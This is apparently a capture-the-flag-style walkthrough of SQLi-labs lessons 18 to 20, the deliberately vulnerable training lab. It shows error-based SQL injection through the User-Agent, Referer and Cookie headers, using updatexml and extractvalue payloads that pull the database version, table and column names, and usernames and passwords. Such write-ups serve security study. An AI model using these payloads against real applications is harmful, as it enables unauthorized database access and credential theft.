SQLi-labs: Lesson 18-20

Header injection.

Lesson 18 echoes the 'User Agent' header.

Lesson 19 echoes the 'Referer' header.

Lesson 20 echoes the almost all http header, cookie is used for injection.

I mainly use updatexml() and extractvalue() functions in this chapter, but other methods(e.g. floor, name_const, join) in previous chapters can also do this.

Lesson 18

First append a single quote(') to the user agent, error message is :

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'Dumb')' at line 1

Append the following queries to the 'User Agent' header:

  1. Get version

    ' and updatexml(1, concat(0x5c, @@version,0x5c),1),1,1)#

    or

    ' and extractvalue(1,concat(0x5c, version(), 0x5c)),1,1)#

    Result: Your User Agent is: ... XPATH syntax error: '\5.6.30-1\'

  2. Get user

    ' and updatexml(1, concat(0x5c, user(), 0x5c),1),1,1)#

    or

    ' and extractvalue(1,concat(0x5c, user(), 0x5c)),1,1)#

    Result: Your User Agent is: ... XPATH syntax error: '\root@localhost\'

  3. Get database

    ' and updatexml(1, concat(0x5c, database(), 0x5c),1),1,1)#

    or

    ' and extractvalue(1,concat(0x5c, database(), 0x5c)),1,1)#

    Result: XPATH syntax error: '\security\'

  4. Get tables

    ' or updatexml(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c),1),1,1)#

    or

    ' or extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c)),1,1)#

    Result: XPATH syntax error: '\emails,referers,uagents,users\'

  5. Get columns

    ' or updatexml(1,concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 0x5c),1),1,1)#

    or

    ' or extractvalue(1,concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 0x5c)),1,1)#

    Result: XPATH syntax error: '\id,username,password\'

  6. Get data(change the substr index and length to get the next id+username+password)

    ' or updatexml(1,concat(0x5c, substr((select group_concat(id,'+',username,'+',password) from users),1,20), 0x5c),1),1,1)#

    or

    ' or extractvalue(1,concat(0x5c, substr((select group_concat(id,'+',username,'+',password) from users),1,20), 0x5c)),1,1)#

    Result: XPATH syntax error: '\1+Dumb+Dumb,2+Angeli\'

Lesson 19

First append a single quote(') to the user agent, error message is :

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1

Append the following queries to the 'Referer' header:

e.g. Get version

' and updatexml(1,concat(0x7c,version(),0x7c),1),1)#

or

' and extractvalue(1,concat(0x7c,version(),0x7c)),1)#

Result: XPATH syntax error: '|5.6.30-1|'

Others are similar.

Lesson 20

First append a single quote(') to the user agent, error message is :

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Dumb'' LIMIT 0,1' at line 1

Append the following queries to the 'Cookie' header on index page:

e.g. Get version

' and updatexml(1,concat(0x7c,version(),0x7c),1)#

Result: Issue with your mysql: XPATH syntax error: '|5.6.30-1|'

Others are similar.

results matching ""

    No results matching ""